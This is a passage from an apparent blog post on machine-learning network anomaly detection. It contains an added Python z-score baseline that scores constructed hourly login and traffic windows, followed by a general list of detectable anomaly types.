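The four steps above, and the unsupervised "learn normal, flag what doesn't fit" approach from the first half of the post, reduce to a short baseline model once the features are in hand. The script below is an added example, not part of the original post and not any product's algorithm: it extracts per-hour features, learns each feature's mean and spread from windows assumed to be normal, then scores new windows by their largest z-score and reports which feature drove the score. The hourly feature windows (including the midnight brute-force case from the post) and the threshold of three standard deviations are constructed assumptions.

```python
"""Minimal unsupervised baseline: learn per-feature mean and spread from windows assumed
normal, score new windows, and alert when the anomaly score crosses a threshold.
Added example, not part of the original post; feature windows are constructed."""
from statistics import mean, pstdev

FEATURES = ("logins_ok", "logins_failed", "bytes_out_mb", "distinct_dst")
THRESHOLD = 3.0   # assumed: flag when any feature sits more than 3 standard deviations out


def train(windows):
    """Step 3: learn per-feature mean and standard deviation from windows assumed normal."""
    model = {}
    for f in FEATURES:
        values = [w[f] for w in windows]
        model[f] = (mean(values), pstdev(values) or 1e-9)  # guard constant features
    return model


def score(model, window):
    """Step 4: anomaly score = largest absolute z-score, plus the feature that produced it.
    Reporting the driving feature is what lets an analyst act on the alert."""
    zs = {f: (window[f] - mu) / sd for f, (mu, sd) in model.items()}
    top = max(zs, key=lambda f: abs(zs[f]))
    return abs(zs[top]), top


def classify(model, window, threshold=THRESHOLD):
    """Return (is_anomaly, score, driving_feature) for one feature window."""
    s, top = score(model, window)
    return s > threshold, round(s, 2), top


# Step 1/2 stand-in: constructed "normal" hourly windows with ~100 logins, a few
# failures, modest egress and a stable set of destinations (deterministic, no RNG).
NORMAL_WINDOWS = [
    {"logins_ok": 100 + (i * 7) % 15, "logins_failed": 3 + (i * 5) % 4,
     "bytes_out_mb": 50 + (i * 11) % 20, "distinct_dst": 20 + (i * 3) % 8}
    for i in range(48)
]
# Constructed test windows: the midnight brute-force from the post, an exfil burst, a quiet hour
BRUTE_FORCE = {"logins_ok": 95, "logins_failed": 1000, "bytes_out_mb": 55, "distinct_dst": 22}
EXFIL_BURST = {"logins_ok": 104, "logins_failed": 4, "bytes_out_mb": 900, "distinct_dst": 23}
QUIET_HOUR = {"logins_ok": 108, "logins_failed": 5, "bytes_out_mb": 60, "distinct_dst": 24}

if __name__ == "__main__":
    model = train(NORMAL_WINDOWS)
    for name, w in (("brute force", BRUTE_FORCE), ("exfil", EXFIL_BURST), ("quiet", QUIET_HOUR)):
        print(name, classify(model, w))
```

A z-score baseline is the simplest member of the unsupervised family; it already shows the two properties the post describes (no labels needed, and new attack shapes like the exfil burst are caught because they deviate, not because they were seen before) and its main weakness, which is that the threshold is the false-positive dial and must be tuned per feature and per environment.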


What Kinds of Anomalies Can Be Detected? 

Machine learning can help detect a wide range of network anomalies, including:

  • Cyberattacks: This includes things like DDoS (Distributed Denial of Service) attacks, where a server is flooded with traffic, as well as malware, ransomware, and phishing attempts.

  • Insider Threats: It can identify unusual behavior from within the network, such as an employee trying to access sensitive data they don't normally use.

  • Network Malfunctions: It can also detect non-malicious anomalies like a failing network device or a misconfigured server.

  • Zero-Day Exploits: Because machine learning looks for deviations from the norm, it can often detect new, previously unknown attacks that traditional signature-based systems would miss.

In short, machine learning provides a more dynamic and intelligent way to protect networks by learning from data to identify and respond to threats in real-time.